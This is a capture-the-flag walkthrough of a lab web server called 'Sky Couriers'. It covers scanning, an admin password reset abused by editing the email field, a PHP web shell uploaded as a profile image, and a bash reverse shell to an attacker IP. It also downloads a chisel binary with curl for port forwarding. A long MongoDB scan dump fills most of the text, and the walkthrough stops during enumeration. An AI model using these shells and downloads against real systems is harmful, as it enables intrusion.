Nmap Results
# Nmap 7.94SVN scan initiated Fri Apr 26 15:51:09 2024 as: nmap -Pn -p- --min-rate 2000 -sC -sV -oN nmap-scan.txt 10.10.152.207
Nmap scan report for 10.10.152.207
Host is up (0.076s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 e6:dc:88:69:de:a1:73:8e:84:5b:a1:3e:27:9f:07:24 (RSA)
| 256 6b:ea:18:5d:8d:c7:9e:9a:01:2c:dd:50:c5:f8:c8:05 (ECDSA)
|_ 256 ef:06:d7:e4:b1:65:15:6e:94:62:cc:dd:f0:8a:1a:24 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Sky Couriers
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Apr 26 15:51:53 2024 -- 1 IP address (1 host up) scanned in 44.11 secondsService Enumeration
TCP/80
I don't believe this server is using virtual hosts, but let's go ahead and add this to our /etc/hosts file anyway.
echo '10.10.152.207 skycouriers.thm' | sudo tee -a /etc/hostsℹ️
Even after adding the server to my
/etc/hosts file, there were no observable differences in the web page behavior when walking the application.
Reset Admin's Password
🤔
Looking at the form, I thought, there's no way this is going to work, but what if I change the email to read
admin@sky.thm?
Username input box and choose Insepct
ℹ️
You could also just submit the form and intercept it in your proxy and overwrite the value there
admin@sky.thm
Log in as Admin
Testing Image Upload Payloads
wwwolf-php-webshell/webshell.php at master · WhiteWinterWolf/wwwolf-php-webshell
WhiteWinterWolf’s PHP web shell. Contribute to WhiteWinterWolf/wwwolf-php-webshell development by creating an account on GitHub.
WhiteWinterWolf
Exploit
Web Shell to Reverse Shell
sudo rlwrap nc -lnvp 443Start the TCP listener to catch the reverse shell
bash -c 'bash -i >& /dev/tcp/10.6.63.22/443 0>&1'
Post-Exploit Enumeration
Operating Environment
OS & Kernel
cat /etc/os-*
NAME="Ubuntu"
VERSION="20.04.2 LTS (Focal Fossa)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 20.04.2 LTS"
VERSION_ID="20.04"
HOME_URL="https://www.ubuntu.com/"
SUPPORT_URL="https://help.ubuntu.com/"
BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"
PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"
VERSION_CODENAME=focal
UBUNTU_CODENAME=focal
www-data@sky:/var/www/html/v2/profileimages$ uname -a
uname -a
Linux sky 5.4.0-73-generic #82-Ubuntu SMP Wed Apr 14 17:39:42 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
Current User
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Sorry, user www-data may not run sudo on sky.
Users and Groups
Local Users
webdeveloper:x:1000:1000:webdeveloper:/home/webdeveloper:/bin/bash
Local Groups
cdrom:x:24:webdeveloper
sudo:x:27:webdeveloper
dip:x:30:webdeveloper
plugdev:x:46:webdeveloper
webdeveloper:x:1000:
Network Configurations
Network Interfaces
eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 9001 qdisc fq_codel state UP group default qlen 1000
link/ether 02:db:d4:f2:21:41 brd ff:ff:ff:ff:ff:ff
inet 10.10.70.244/16 brd 10.10.255.255 scope global dynamic eth0
valid_lft 2353sec preferred_lft 2353sec
inet6 fe80::db:d4ff:fef2:2141/64 scope link
valid_lft forever preferred_lft forever
Open Ports
tcp LISTEN 0 4096 127.0.0.1:27017 0.0.0.0:*
tcp LISTEN 0 151 127.0.0.1:3306 0.0.0.0:*
tcp LISTEN 0 70 127.0.0.1:33060 0.0.0.0:*
tcp LISTEN 0 511 127.0.0.1:9000 0.0.0.0:*
Processes and Services
Interesting Processes
mongodb 553 0.4 7.8 1497704 78184 ? Ssl 18:04 0:29 /usr/bin/mongod --config /etc/mongod.conf
mysql 727 0.2 34.5 1284800 345952 ? Ssl 18:04 0:15 /usr/sbin/mysqld
Interesting Services
mongod.service loaded active running MongoDB Database Server
mysql.service loaded active running MySQL Community Server
Interesting Files
/etc/mongod.conf
# network interfaces
net:
port: 27017
bindIp: 127.0.0.1
Privilege Escalation
Port Forwarding with Chisel
Port Forwarding with C... | 0xBEN | Notes
GitHub
Download from the Releases Page Usage
Requires a copy of the Chisel binary on: The ta…
Following my notes at the link above, I am going to use the download_chisel function to download the latest chisel binaries and then transfer to the target.
File Transfers and Dat... | 0xBEN | Notes
sudo python3 -m http.server 80Host the chisel binary via HTTP server on Kali
curl http://10.6.63.22/chisel -o /tmp/chisel && chmod u+x /tmp/chiselDownload chisel to the target and make it executable
sudo ./chisel server --port 8081 --reverse &Start the chisel server on tcp/8081 on Kali and allow reverse port forwarding
/tmp/chisel client 10.6.63.22:8081 R:127.0.0.1:27017:127.0.0.1:27017 R:127.0.0.1:3306:127.0.0.1:3306 R:127.0.0.1:9000:127.0.0.1:9000 &Reverse forward ports tcp/27017, tcp/3306, and tcp/9000 from Kali to the target
sudo nmap -Pn -T4 -sT -p27017,3306,9000 -sC -sV -oN nmap-chisel.txt 127.0.0.1Scan the ports through the Chisel proxy
nmap-chisel.txt
# Nmap 7.94SVN scan initiated Tue Apr 30 16:44:52 2024 as: nmap -Pn -T4 -sT -p27017,3306,9000 -sC -sV -oN nmap-chisel.txt 127.0.0.1
Nmap scan report for localhost (127.0.0.1)
Host is up (0.00012s latency).
PORT STATE SERVICE VERSION
3306/tcp open mysql MySQL 8.0.25-0ubuntu0.20.04.1
|_ssl-date: TLS randomness does not represent time
| mysql-info:
| Protocol: 10
| Version: 8.0.25-0ubuntu0.20.04.1
| Thread ID: 35
| Capabilities flags: 65535
| Some Capabilities: Support41Auth, LongColumnFlag, SwitchToSSLAfterHandshake, IgnoreSpaceBeforeParenthesis, SupportsLoadDataLocal, SupportsTransactions, IgnoreSigpipes, ODBCClient, FoundRows, DontAllowDatabaseTableColumn, Speaks41ProtocolNew, InteractiveClient, ConnectWithDatabase, LongPassword, SupportsCompression, Speaks41ProtocolOld, SupportsAuthPlugins, SupportsMultipleStatments, SupportsMultipleResults
| Status: Autocommit
| Salt: H?w.=\x01K%\x04R\x13hlK\x19v*M[!
|_ Auth Plugin Name: caching_sha2_password
| ssl-cert: Subject: commonName=MySQL_Server_8.0.25_Auto_Generated_Server_Certificate
| Not valid before: 2021-05-25T08:42:27
|_Not valid after: 2031-05-23T08:42:27
9000/tcp open cslistener?
27017/tcp open mongodb MongoDB 4.4.6 4.4.6
| mongodb-databases:
| totalSize = 249856.0
| ok = 1.0
| databases
| 3
| name = local
| empty = false
| sizeOnDisk = 73728.0
| 2
| name = config
| empty = false
| sizeOnDisk = 36864.0
| 1
| name = backup
| empty = false
| sizeOnDisk = 98304.0
| 0
| name = admin
| empty = false
|_ sizeOnDisk = 40960.0
| mongodb-info:
| MongoDB Build info
| ok = 1.0
| maxBsonObjectSize = 16777216
| storageEngines
| 3 = wiredTiger
| 2 = ephemeralForTest
| 1 = devnull
| 0 = biggie
| javascriptEngine = mozjs
| debug = false
| bits = 64
| sysInfo = deprecated
| buildEnvironment
| distarch = x86_64
| ccflags = -fno-omit-frame-pointer -fno-strict-aliasing -fasynchronous-unwind-tables -ggdb -pthread -Wall -Wsign-compare -Wno-unknown-pragmas -Winvalid-pch -Werror -O2 -Wno-unused-local-typedefs -Wno-unused-function -Wno-deprecated-declarations -Wno-unused-const-variable -Wno-unused-but-set-variable -Wno-missing-braces -fstack-protector-strong -fno-builtin-memcmp
| target_arch = x86_64
| distmod = ubuntu2004
| cxx = /opt/mongodbtoolchain/v3/bin/g++: g++ (GCC) 8.3.0
| cppdefines = SAFEINT_USE_INTRINSICS 0 PCRE_STATIC NDEBUG _XOPEN_SOURCE 700 _GNU_SOURCE _FORTIFY_SOURCE 2 BOOST_THREAD_VERSION 5 BOOST_THREAD_USES_DATETIME BOOST_SYSTEM_NO_DEPRECATED BOOST_MATH_NO_LONG_DOUBLE_MATH_FUNCTIONS BOOST_ENABLE_ASSERT_DEBUG_HANDLER BOOST_LOG_NO_SHORTHAND_NAMES BOOST_LOG_USE_NATIVE_SYSLOG BOOST_LOG_WITHOUT_THREAD_ATTR ABSL_FORCE_ALIGNED_ACCESS
| linkflags = -pthread -Wl,-z,now -rdynamic -Wl,--fatal-warnings -fstack-protector-strong -fuse-ld=gold -Wl,--no-threads -Wl,--build-id -Wl,--hash-style=gnu -Wl,-z,noexecstack -Wl,--warn-execstack -Wl,-z,relro -Wl,-z,origin -Wl,--enable-new-dtags
| target_os = linux
| cc = /opt/mongodbtoolchain/v3/bin/gcc: gcc (GCC) 8.3.0
| cxxflags = -Woverloaded-virtual -Wno-maybe-uninitialized -fsized-deallocation -std=c++17
| gitVersion = 72e66213c2c3eab37d9358d5e78ad7f5c1d0d0d7
| openssl
| running = OpenSSL 1.1.1f 31 Mar 2020
| compiled = OpenSSL 1.1.1f 31 Mar 2020
| versionArray
| 3 = 0
| 2 = 6
| 1 = 4
| 0 = 4
| version = 4.4.6
| modules
| allocator = tcmalloc
| Server status
| transportSecurity
| 1.1 = 0
| 1.0 = 0
| 1.3 = 0
| 1.2 = 0
| unknown = 0
| opReadConcernCounters
| none = 34
| linearizable = 0
| snapshot = 0
| majority = 0
| available = 0
| local = 0
| freeMonitoring
| state = undecided
| localTime = 1714509920138
| process = mongod
| uptimeEstimate = 9661
| wiredTiger
| oplog
| visibility timestamp = Timestamp(0, 0)
| transaction
| transaction checkpoint max time (msecs) = 46
| rollback to stable keys removed = 0
| set timestamp oldest calls = 0
| transactions rolled back = 393
| transaction sync calls = 0
| rollback to stable restored updates from history store = 0
| update conflicts = 0
| transaction range of timestamps currently pinned = 0
| Number of prepared updates = 0
| transaction checkpoint most recent duration for gathering skipped handles (usecs) = 15
| transaction fsync duration for checkpoint after allocating the transaction ID (usecs) = 737
| transaction checkpoint scrub time (msecs) = 0
| transaction range of IDs currently pinned = 0
| query timestamp calls = 9616
| prepared transactions committed = 0
| transaction range of timestamps pinned by the oldest timestamp = 0
| race to read prepared update retry = 0
| transaction checkpoint prepare total time (msecs) = 0
| rollback to stable pages visited = 1
| transaction checkpoint prepare min time (msecs) = 0
| transaction walk of concurrent sessions = 22061
| transaction fsync calls for checkpoint after allocating the transaction ID = 161
| transaction checkpoint most recent handles walked = 20
| set timestamp durable updates = 0
| set timestamp calls = 0
| rollback to stable updates removed from history store = 0
| transaction checkpoint currently running = 0
| transaction range of timestamps pinned by a checkpoint = 0
| rollback to stable keys restored = 0
| transaction begins = 395
| set timestamp stable calls = 0
| transaction checkpoint most recent handles applied = 2
| set timestamp oldest updates = 0
| prepared transactions currently active = 0
| rollback to stable restored tombstones from history store = 0
| transaction checkpoints skipped because database was clean = 0
| transaction checkpoints = 161
| transaction range of timestamps pinned by the oldest active read timestamp = 0
| transaction failures due to history store = 0
| transaction rollback to stable currently running = 0
| transaction checkpoint prepare most recent time (msecs) = 0
| rollback to stable updates aborted = 0
| transaction checkpoint history store file duration (usecs) = 60
| prepared transactions rolled back = 0
| transaction checkpoints due to obsolete pages = 0
| rollback to stable inconsistent checkpoint = 0
| rollback to stable sweeping history store keys = 0
| transaction checkpoint prepare currently running = 0
| set timestamp durable calls = 0
| transactions committed = 2
| transaction checkpoint most recent time (msecs) = 9
| transaction checkpoint most recent handles skipped = 7
| transaction checkpoint min time (msecs) = 6
| rollback to stable calls = 0
| prepared transactions = 0
| rollback to stable tree walk skipping pages = 0
| transaction checkpoint generation = 162
| transaction checkpoint prepare max time (msecs) = 0
| transaction checkpoint scrub dirty target = 0
| rollback to stable history store records with stop timestamps older than newer records = 0
| transaction checkpoint most recent duration for gathering applied handles (usecs) = 82
| transaction checkpoint most recent duration for gathering all handles (usecs) = 113
| transaction checkpoint total time (msecs) = 1476
| transaction range of IDs currently pinned by a checkpoint = 0
| set timestamp stable updates = 0
| transaction read timestamp of the oldest active reader = 0
| data-handle
| connection data handles currently active = 19
| connection sweep dhandles removed from hash list = 325
| connection sweep time-of-death sets = 1626
| session sweep attempts = 194
| connection sweep candidate became referenced = 0
| connection sweep dhandles closed = 0
| session dhandles swept = 18
| connection sweeps = 961
| connection data handle size = 432
| connection sweeps skipped due to checkpoint gathering handles = 0
| cursor
| cursor modify value bytes modified = 0
| cursor update key and value bytes = 0
| cursor search near calls = 180
| cursor modify key and value bytes affected = 0
| cursor bulk loaded cursor insert calls = 0
| cursor prev calls that skip greater than or equal to 100 entries = 0
| cursor update value size change = 0
| cursor sweeps = 2300
| Total number of entries skipped by cursor next calls = 0
| cursor next calls that skip greater than or equal to 100 entries = 0
| cursor sweep cursors closed = 0
| cursors reused from cache = 127070
| cursor truncate calls = 0
| cursor sweep cursors examined = 32
| cursor search calls = 2143
| cursor create calls = 59
| Total number of entries skipped to position the history store cursor = 0
| cursor prev calls = 175
| cursor prev calls that skip due to a globally visible history store tombstone = 0
| cursor insert calls = 650
| cursor prev calls that skip less than 100 entries = 175
| open cursor count = 6
| cursor update calls = 0
| cursor next calls that skip less than 100 entries = 349
| cursor operation restarted = 0
| cursor next calls = 351
| cursor modify calls = 0
| cursor reset calls = 131218
| cursor insert key and value bytes = 445286
| cursor close calls that result in cache = 127083
| cursor remove key bytes removed = 0
| Total number of entries skipped by cursor prev calls = 0
| cursor remove calls = 0
| cursor reserve calls = 0
| cursor search history store calls = 0
| cursor sweep buckets = 13800
| cached cursor count = 13
| cursor next calls that skip due to a globally visible history store tombstone = 0
| log
| log bytes written = 290432
| log sync_dir operations = 1
| log scan operations = 6
| log flush operations = 96140
| log sync_dir time duration (usecs) = 2162
| pre-allocated log files prepared = 2
| total log buffer size = 33554432
| log force write operations skipped = 106543
| slot join calls atomic updates raced = 0
| slot join atomic update races = 0
| slot closures = 179
| slot join found active slot closed = 0
| maximum log file size = 104857600
| pre-allocated log files not ready and missed = 1
| slot join calls slept = 0
| logging bytes consolidated = 289920
| log records too small to compress = 646
| records processed by log scan = 15
| slot join calls found active slot closed = 0
| total size of compressed records = 198983
| log bytes of payload data = 233997
| busy returns attempting to switch slots = 0
| pre-allocated log files used = 0
| written slots coalesced = 0
| slot close lost race = 0
| log sync operations = 179
| yields waiting for previous log file close = 0
| number of pre-allocated log files to create = 2
| log release advances write LSN = 162
| total in-memory size of compressed records = 449874
| slot unbuffered writes = 0
| slot transitions unable to find free slot = 0
| slot joins yield time (usecs) = 0
| slot close unbuffered waits = 0
| slot join calls yielded = 0
| log server thread write LSN walk skipped = 10456
| log scan records requiring two reads = 0
| log records compressed = 161
| slot join calls did not yield = 807
| log sync time duration (usecs) = 229380
| log server thread advances write LSN = 17
| log files manually zero-filled = 0
| log force write operations = 106560
| force archive time sleeping (usecs) = 0
| log records not compressed = 0
| log write operations = 807
| snapshot-window-settings
| current cache pressure percentage = 0
| latest majority snapshot timestamp available = Jan 1 00:00:00:0
| total number of SnapshotTooOld errors = 0
| oldest majority snapshot timestamp available = Jan 1 00:00:00:0
| max target available snapshots window size in seconds = 5
| current available snapshots window size in seconds = 0
| target available snapshots window size in seconds = 5
| cache pressure percentage threshold = 95
| block-manager
| bytes written = 7303168
| blocks read = 187
| bytes read = 790528
| number of times the file was remapped because it changed size via fallocate or truncate = 0
| mapped bytes read = 0
| bytes written via memory map API = 0
| blocks pre-loaded = 7
| mapped blocks read = 0
| bytes written via system call API = 0
| bytes read via system call API = 0
| bytes written for checkpoint = 7303168
| bytes read via memory map API = 0
| blocks written = 817
| number of times the region was remapped via write = 0
| capacity
| bytes written total = 1262682915.0
| time waiting due to total capacity (usecs) = 0
| time waiting during eviction (usecs) = 0
| time waiting during logging (usecs) = 0
| bytes read = 81920
| bytes written for eviction = 0
| background fsync file handles synced = 0
| background fsync time (msecs) = 0
| threshold to call fsync = 0
| time waiting during checkpoint (usecs) = 0
| bytes written for checkpoint = 4152739
| time waiting during read (usecs) = 0
| bytes written for log = 1258530176.0
| background fsync file handles considered = 0
| lock
| read timestamp queue lock internal thread time waiting (usecs) = 0
| checkpoint lock acquisitions = 161
| txn global lock internal thread time waiting (usecs) = 0
| txn global write lock acquisitions = 483
| txn global read lock acquisitions = 576
| txn global lock application thread time waiting (usecs) = 0
| table read lock acquisitions = 0
| metadata lock internal thread wait time (usecs) = 0
| table write lock acquisitions = 10
| durable timestamp queue read lock acquisitions = 0
| durable timestamp queue lock application thread time waiting (usecs) = 0
| schema lock acquisitions = 183
| durable timestamp queue lock internal thread time waiting (usecs) = 0
| dhandle lock application thread time waiting (usecs) = 0
| checkpoint lock internal thread wait time (usecs) = 0
| table lock application thread time waiting for the table lock (usecs) = 0
| metadata lock application thread wait time (usecs) = 0
| dhandle read lock acquisitions = 39430
| checkpoint lock application thread wait time (usecs) = 0
| schema lock application thread wait time (usecs) = 0
| read timestamp queue lock application thread time waiting (usecs) = 0
| read timestamp queue write lock acquisitions = 0
| schema lock internal thread wait time (usecs) = 0
| dhandle lock internal thread time waiting (usecs) = 0
| dhandle write lock acquisitions = 673
| durable timestamp queue write lock acquisitions = 0
| table lock internal thread time waiting for the table lock (usecs) = 0
| metadata lock acquisitions = 161
| read timestamp queue read lock acquisitions = 0
| session
| table verify failed calls = 0
| table rename successful calls = 0
| tiered storage local retention time (secs) = 0
| table salvage successful calls = 0
| open session count = 13
| table create successful calls = 1
| tiered storage object size = 0
| table verify successful calls = 0
| table drop successful calls = 0
| table create failed calls = 0
| table salvage failed calls = 0
| table alter failed calls = 0
| table truncate failed calls = 0
| table alter unchanged and skipped = 0
| table truncate successful calls = 0
| table drop failed calls = 0
| table compact failed calls = 0
| flush_tier operation calls = 0
| table alter successful calls = 0
| session query timestamp calls = 0
| table compact successful calls = 0
| table rename failed calls = 0
| thread-yield
| application thread time evicting (usecs) = 0
| page reconciliation yielded due to child modification = 0
| page acquire busy blocked = 0
| page access yielded due to prepare state change = 0
| page delete rollback time sleeping for state change (usecs) = 0
| data handle lock yielded = 0
| log server sync yielded for log write = 0
| application thread time waiting for cache (usecs) = 0
| get reference for page index and slot time sleeping (usecs) = 0
| connection close blocked waiting for transaction state stabilization = 0
| page acquire read blocked = 0
| page acquire eviction blocked = 0
| connection close yielded for lsm manager shutdown = 0
| page acquire locked blocked = 0
| page acquire time sleeping (usecs) = 0
| reconciliation
| records written including a prepare state = 0
| pages written including at least one stop durable timestamp = 0
| approximate byte size of transaction IDs in pages written = 5144
| pages written including an aggregated prepare = 0
| pages written including at least one stop timestamp = 0
| page reconciliation calls = 809
| pages written including at least one stop transaction ID = 0
| pages written including at least one prepare state = 0
| pages written including at least one start durable timestamp = 0
| leaf-page overflow keys = 0
| records written including a start timestamp = 0
| split objects currently awaiting free = 0
| page reconciliation calls that resulted in values with timestamps = 0
| page reconciliation calls that resulted in values with prepared transaction metadata = 0
| approximate byte size of timestamps in pages written = 0
| fast-path pages deleted = 0
| split bytes currently awaiting free = 0
| records written including a start transaction ID = 643
| pages written including at least one start transaction ID = 160
| pages written including an aggregated newest start durable timestamp = 0
| records written including a stop timestamp = 0
| page reconciliation calls that resulted in values with transaction ids = 160
| records written including a stop transaction ID = 0
| page reconciliation calls for eviction = 160
| pages written including an aggregated newest stop durable timestamp = 0
| pages deleted = 481
| pages written including at least one start timestamp = 0
| records written including a start durable timestamp = 0
| pages written including an aggregated newest stop transaction ID = 0
| maximum seconds spent in a reconciliation call = 0
| records written including a stop durable timestamp = 0
| pages written including an aggregated newest transaction ID = 0
| internal-page overflow keys = 0
| pages written including an aggregated newest stop timestamp = 0
| pages written including an aggregated oldest start timestamp = 0
| thread-state
| active filesystem fsync calls = 0
| active filesystem read calls = 0
| active filesystem write calls = 0
| checkpoint-cleanup
| pages added for eviction = 160
| pages visited = 324
| pages skipped during tree walk = 0
| pages removed = 0
| concurrentTransactions
| read
| totalTickets = 128
| out = 1
| available = 127
| write
| totalTickets = 128
| out = 0
| available = 128
| uri = statistics:
| connection
| files currently open = 13
| memory frees = 504519
| total write I/Os = 1161
| auto adjusting condition wait calls = 59467
| hash bucket array size for data handles = 512
| pthread mutex shared lock read-lock calls = 213797
| total read I/Os = 1608
| pthread mutex condition wait calls = 157098
| detected system time went backwards = 0
| auto adjusting condition resets = 809
| auto adjusting condition wait raced to update timeout and skipped updating = 0
| total fsync I/Os = 996
| memory allocations = 505318
| memory re-allocations = 39113
| pthread mutex shared lock write-lock calls = 11471
| hash bucket array size general = 512
| perf
| operation write latency histogram (bucket 1) - 100-249us = 0
| operation read latency histogram (bucket 3) - 500-999us = 1
| file system write latency histogram (bucket 1) - 10-49ms = 0
| file system read latency histogram (bucket 4) - 250-499ms = 0
| operation write latency histogram (bucket 2) - 250-499us = 1
| operation write latency histogram (bucket 4) - 1000-9999us = 0
| operation read latency histogram (bucket 4) - 1000-9999us = 0
| operation read latency histogram (bucket 1) - 100-249us = 0
| file system write latency histogram (bucket 3) - 100-249ms = 0
| file system write latency histogram (bucket 4) - 250-499ms = 0
| file system read latency histogram (bucket 6) - 1000ms+ = 0
| operation write latency histogram (bucket 3) - 500-999us = 0
| operation read latency histogram (bucket 2) - 250-499us = 0
| file system read latency histogram (bucket 5) - 500-999ms = 0
| file system write latency histogram (bucket 6) - 1000ms+ = 0
| operation write latency histogram (bucket 5) - 10000us+ = 0
| file system write latency histogram (bucket 5) - 500-999ms = 0
| file system read latency histogram (bucket 1) - 10-49ms = 55
| file system read latency histogram (bucket 3) - 100-249ms = 17
| file system read latency histogram (bucket 2) - 50-99ms = 20
| file system write latency histogram (bucket 2) - 50-99ms = 0
| operation read latency histogram (bucket 5) - 10000us+ = 1
| cache
| history store table on-disk size = 4096
| eviction walks gave up because they restarted their walk twice = 0
| leaf pages split during eviction = 0
| tracked dirty bytes in the cache = 847
| internal pages evicted = 0
| eviction walk target strategy only dirty pages = 0
| history store score = 0
| eviction walk target pages histogram - 128 and higher = 0
| modified pages evicted by application threads = 0
| eviction server evicting pages = 0
| pages written requiring in-memory restoration = 0
| forced eviction - pages selected unable to be evicted time = 0
| pages written from cache = 328
| pages seen by eviction walk = 0
| files with active eviction walks = 0
| eviction worker thread removed = 0
| pages requested from the cache = 4633
| pages read into cache after truncate in prepare state = 0
| eviction worker thread created = 0
| eviction worker thread active = 4
| forced eviction - pages selected unable to be evicted count = 0
| history store table truncation to remove range of updates due to key being removed from the data page during reconciliation = 0
| checkpoint blocked page eviction = 0
| bytes not belonging to page images in the cache = 23401
| forced eviction - pages evicted that were dirty count = 0
| history store table writes requiring squashed modifies = 0
| pages queued for urgent eviction = 160
| eviction walk target strategy only clean pages = 0
| in-memory page splits = 0
| eviction calls to get a page = 796
| overflow pages read into cache = 0
| history store table reads requiring squashed modifies = 0
| forced eviction - pages evicted that were dirty time (usecs) = 0
| unmodified pages evicted = 0
| eviction walks started from saved location in tree = 0
| pages currently held in the cache = 18
| eviction server candidate queue empty when topping up = 0
| maximum bytes configured = 268435456
| bytes written from cache = 4186597
| internal pages split during eviction = 0
| eviction walk target pages histogram - 10-31 = 0
| page split during eviction deepened the tree = 0
| eviction calls to get a page found queue empty = 636
| history store table truncation by rollback to stable to remove an update = 0
| page written requiring history store records = 0
| forced eviction - pages evicted that were clean count = 0
| tracked dirty pages in the cache = 2
| forced eviction - history store pages failed to evict while session has history store cursor open = 0
| forced eviction - session returned rollback error while force evicting due to being oldest = 0
| forced eviction - history store pages selected while session has history store cursor open = 0
| eviction worker thread evicting pages = 160
| pages read into cache after truncate = 161
| history store table truncation to remove an update = 0
| forced eviction - pages evicted that were clean time (usecs) = 0
| history store table truncation to remove range of updates due to non timestamped update on data page = 0
| modified pages evicted = 160
| maximum page size at eviction = 352
| pages selected for eviction unable to be evicted as the parent page has overflow items = 0
| history store table reads missed = 0
| eviction server slept, because we did not make progress with eviction = 159
| history store table reads = 0
| eviction walk target pages histogram - 0-9 = 0
| eviction state = 64
| pages evicted in parallel with checkpoint = 160
| history store table max on-disk size = 0
| files with new eviction walks started = 0
| cache overflow score = 0
| eviction walks abandoned = 0
| tracked bytes belonging to internal pages in the cache = 3827
| eviction walk target pages histogram - 32-63 = 0
| bytes read into cache = 55907
| pages seen by eviction walk that are already queued = 0
| bytes currently in the cache = 83781
| history store table insert calls = 0
| application threads page read from disk to cache count = 6
| eviction walks gave up because they saw too many pages and found too few candidates = 0
| eviction worker thread stable number = 0
| eviction walks restarted = 0
| eviction walks started from root of tree = 0
| forced eviction - history store pages successfully evicted while session has history store cursor open = 0
| hazard pointer blocked page eviction = 0
| operations timed out waiting for space in cache = 0
| history store table out-of-order updates that were fixed up during insertion = 0
| forced eviction - pages selected because of too many deleted items count = 0
| pages selected for eviction unable to be evicted because of failure in reconciliation = 0
| eviction passes of a file = 0
| eviction walk target pages reduced due to history store cache pressure = 0
| bytes belonging to the history store table in the cache = 554
| eviction empty score = 0
| application threads page read from disk to cache time (usecs) = 3148
| history store table out-of-order resolved updates that lose their durable timestamp = 0
| pages queued for eviction = 0
| hazard pointer check calls = 160
| pages read into cache = 14
| eviction walks reached end of tree = 0
| history store table insert calls that returned restart = 0
| tracked bytes belonging to leaf pages in the cache = 79954
| percentage overhead = 8
| eviction walks gave up because they saw too many pages and found no candidates = 0
| pages walked for eviction = 0
| pages queued for eviction post lru sorting = 0
| forced eviction - pages selected count = 0
| pages selected for eviction unable to be evicted because of active children on an internal page = 0
| pages selected for eviction unable to be evicted = 0
| pages evicted by application threads = 0
| pages queued for urgent eviction from history store due to high dirty content = 0
| pages queued for urgent eviction during walk = 0
| hazard pointer check entries walked = 2
| eviction walk target pages histogram - 64-128 = 0
| internal pages seen by eviction walk = 0
| eviction walk target strategy both clean and dirty pages = 0
| eviction calls to get a page found queue empty after locking = 0
| application threads page write from cache to disk time (usecs) = 17366
| eviction currently operating in aggressive mode = 0
| bytes dirty in the cache cumulative = 6967909
| eviction server unable to reach eviction goal = 0
| application threads page write from cache to disk count = 326
| eviction server candidate queue not empty when topping up = 0
| internal pages seen by eviction walk that are already queued = 0
| force re-tuning of eviction workers once in a while = 0
| in-memory page passed criteria to be split = 0
| history store table out-of-order updates that were fixed up by moving existing records = 0
| eviction server waiting for a leaf page = 1
| internal pages queued for eviction = 0
| history store table truncation by rollback to stable to remove an unstable update = 0
| bytes belonging to page images in the cache = 60379
| hazard pointer maximum array length = 2
| bytes allocated for updates = 18495
| storageEngine
| name = wiredTiger
| supportsPendingDrops = true
| supportsTwoPhaseIndexBuild = true
| supportsSnapshotReadConcern = true
| supportsCommittedReads = true
| backupCursorOpen = false
| persistent = true
| oldestRequiredTimestampForCrashRecovery = Timestamp(0, 0)
| dropPendingIdents = 0
| readOnly = false
| electionMetrics
| catchUpTakeover
| called = 0
| successful = 0
| averageCatchUpOps = 0.0
| numCatchUpsFailedWithError = 0
| numStepDownsCausedByHigherTerm = 0
| numCatchUpsTimedOut = 0
| electionTimeout
| called = 0
| successful = 0
| numCatchUpsSkipped = 0
| numCatchUpsFailedWithReplSetAbortPrimaryCatchUpCmd = 0
| numCatchUpsFailedWithNewTerm = 0
| stepUpCmd
| called = 0
| successful = 0
| numCatchUpsSucceeded = 0
| numCatchUpsAlreadyCaughtUp = 0
| numCatchUps = 0
| priorityTakeover
| called = 0
| successful = 0
| freezeTimeout
| called = 0
| successful = 0
| extra_info
| output_blocks = 51320
| voluntary_context_switches = 358078
| maximum_resident_set_kb = 85996
| user_time_us = 34075310
| page_faults = 556
| input_blocks = 134168
| system_time_us = 3455219
| involuntary_context_switches = 34034
| note = fields vary by platform
| page_reclaims = 16455
| mem
| supported = true
| bits = 64
| resident = 66
| virtual = 1464
| locks
| ReplicationStateTransition
| acquireCount
| w = 38897
| Global
| acquireCount
| w = 165
| r = 38728
| W = 4
| Mutex
| acquireCount
| r = 433
| Collection
| acquireCount
| w = 161
| r = 312
| W = 2
| Database
| acquireCount
| w = 161
| r = 269
| W = 4
| ParallelBatchWriterMode
| acquireCount
| r = 334
| opLatencies
| transactions
| ops = 0
| latency = 0
| reads
| ops = 0
| latency = 0
| commands
| ops = 9
| latency = 27968
| writes
| ops = 0
| latency = 0
| flowControl
| timeAcquiringMicros = 619
| targetRateLimit = 1000000000
| isLagged = false
| isLaggedCount = 0
| sustainerRate = 0
| isLaggedTimeMicros = 0
| enabled = true
| locksPerKiloOp = 0.0
| twoPhaseCommitCoordinator
| totalAbortedTwoPhaseCommit = 0
| totalCreated = 0
| currentInSteps
| deletingCoordinatorDoc = 0
| writingDecision = 0
| writingParticipantList = 0
| waitingForVotes = 0
| waitingForDecisionAcks = 0
| totalStartedTwoPhaseCommit = 0
| totalCommittedTwoPhaseCommit = 0
| uptime = 9660.0
| uptimeMillis = 9661686
| transactions
| totalAborted = 0
| currentActive = 0
| currentInactive = 0
| retriedCommandsCount = 0
| totalStarted = 0
| currentPrepared = 0
| transactionsCollectionWriteCount = 0
| retriedStatementsCount = 0
| currentOpen = 0
| totalPrepared = 0
| totalPreparedThenAborted = 0
| totalCommitted = 0
| totalPreparedThenCommitted = 0
| security
| authentication
| mechanisms
| MONGODB-X509
| speculativeAuthenticate
| received = 0
| successful = 0
| authenticate
| received = 0
| successful = 0
| SCRAM-SHA-256
| speculativeAuthenticate
| received = 0
| successful = 0
| authenticate
| received = 0
| successful = 0
| SCRAM-SHA-1
| speculativeAuthenticate
| received = 0
| successful = 0
| authenticate
| received = 0
| successful = 0
| asserts
| msg = 0
| rollovers = 0
| user = 12
| warning = 0
| regular = 0
| logicalSessionRecordCache
| lastSessionsCollectionJobTimestamp = 1714509906275
| lastSessionsCollectionJobCursorsClosed = 0
| lastSessionsCollectionJobEntriesEnded = 0
| lastTransactionReaperJobDurationMillis = 0
